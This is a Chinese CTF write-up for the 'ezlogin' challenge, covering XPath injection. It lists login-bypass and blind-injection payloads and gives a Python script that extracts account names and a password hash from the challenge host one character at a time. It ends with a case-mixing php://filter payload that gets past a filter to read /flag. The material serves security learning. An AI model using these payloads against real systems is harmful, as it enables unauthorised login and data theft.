ezlogin
考点:xpath注入
xpath注入:https://www.tr0y.wang/2019/05/11/XPath%E6%B3%A8%E5%85%A5%E6%8C%87%E5%8C%97/
这里稍微总结一下,例如有这样一个xml:
<?xml version="1.0" encoding="UTF-8"?>
<root>
<users>
<user>
<id>1</id>
<username>admin</username>
<password type="md5">0192023a7bbd73250516f069df18b500</password>
</user>
<user>
<id>2</id>
<username>jack</username>
<password type="md5">1d6c1e168e362bc0092f247399003a88</password>
</user>
<user>
<id>3</id>
<username>tony</username>
<password type="md5">cc20f43c8c24dbc0b2539489b113277a</password>
</user>
</users>
</root>
查询语句为:
"/root/users/user[username/text()='".$name."' and password/text()='".$pwd."']";
1.万能密码:admin' or '1
,这样被拼接为:
/root/users/user[username/text()='admin' or '1' and ...
由于xpath中没有注释,所以需要手动闭合单引号
或:admin'] | //* | //*['
,意思是遍历结点
2.盲注:
' or count(/)=1 or '1 | 判断有几个根节点 |
' or string-length(name(/*[1]))=1 or '1 | 获取根节点长度 |
' or substring(name(/*[1]), 1, 1)='a' or '1 | 获取内容 |
例如substring(/root/users/user[1]/password/text(),1,1)
是取admin的第一位密码
首先看一下能否盲注:' or count(/)=1 or '1
' or count(/)=2 or '1
可盲注,然后这里用了一个token,这个token很快就会过期,所以还需要正则匹配一下
import requests
import re
sess = requests.session()
strs='abcdefghijklmnopqrstuvwxyzABCDEFZHIJKLMNOPQRSTUVWKYZ1234567890'
headers = {'Content-Type':'application/xml'}
param='<input type="hidden" id="token" value="(.*?)" />'
t=''
for i in range(1,50):
for s in strs:
url='http://ha1cyon-ctf.fun:30015/login.php'#注意加login.php
token=re.findall(param,sess.get(url).text)[0]
#第一个根节点为root
#data="<username>' or substring(name(/*[1]), '"+str(i)+"', 1)='"+str(s)+"' or '1</username><password>123</password><token>"+token+"</token>"
#第二个节点为accounts
#data = "<username>' or substring(name(/root/*[1]), '" + str(i) + "', 1)='" + str(s) + "' or '1</username><password>123</password><token>" + token + "</token>"
#第三个节点为user
#data = "<username>' or substring(name(/root/accounts/*[1]), '" + str(i) + "', 1)='" + str(s) + "' or '1</username><password>123</password><token>" + token + "</token>"
#遍历[1][2][3],在user节点下得到id,username,password
#data = "<username>' or substring(name(/root/accounts/user/*[1]), '" + str(i) + "', 1)='" + str(s) + "' or '1</username><password>123</password><token>" + token + "</token>"
#之后取user下的子节点username(user[1]),得到 gtfly123
#取第二个子节点user[2]结果是adm1n
data = "<username>' or substring(/root/accounts/user[2]/password/text(), '" + str(i) + "', 1)='" + str(s) + "' or '1</username><password>123</password><token>" + token + "</token>"
res=sess.post(url=url,headers=headers,data=data)
if '非法操作' in res.text:
t+=s
print(t)
break
最后可以判断格式为:
<root>
<accounts>
<user>
<id></id>
<username>gtfly123</username>
<password>e10adc3949ba59abbe56e057f20f883e</password>
</user>
<user>
<id></id>
<username>adm1n</username>
<password>cf7414b5bdb2e65ee43083f4ddbc4d9f</password>
</user>
</accounts>
</root>
解密一下adm1n,gtfly123登陆后台,然后是一个文件包含,但返回结果不允许出现flag,并且过滤了php、base字符,可用大小写绕过:
Php://filter/convert.Base64-encode/resource=/flag